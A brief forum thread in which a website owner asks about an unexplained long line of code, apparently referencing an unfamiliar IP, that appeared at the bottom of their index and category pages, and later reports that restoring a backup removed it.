Strange Code at the bottom of my index page

I have no idea where this came from I did edit my index page today but only added literally 2 letters to the end of a sentence but look at the bottom of my page not only is there a big gap between my google ads and my footer but there is a strange LONG line of code, what is this and how do I get rid of it?

It also appears in my categories but goes away in my sub categories.

Where are you seeing that code, can I just delete it? I don't recognize the IP..

I had a recent backup of the site on my HDD so I reloaded the site and it disappeared. No idea.
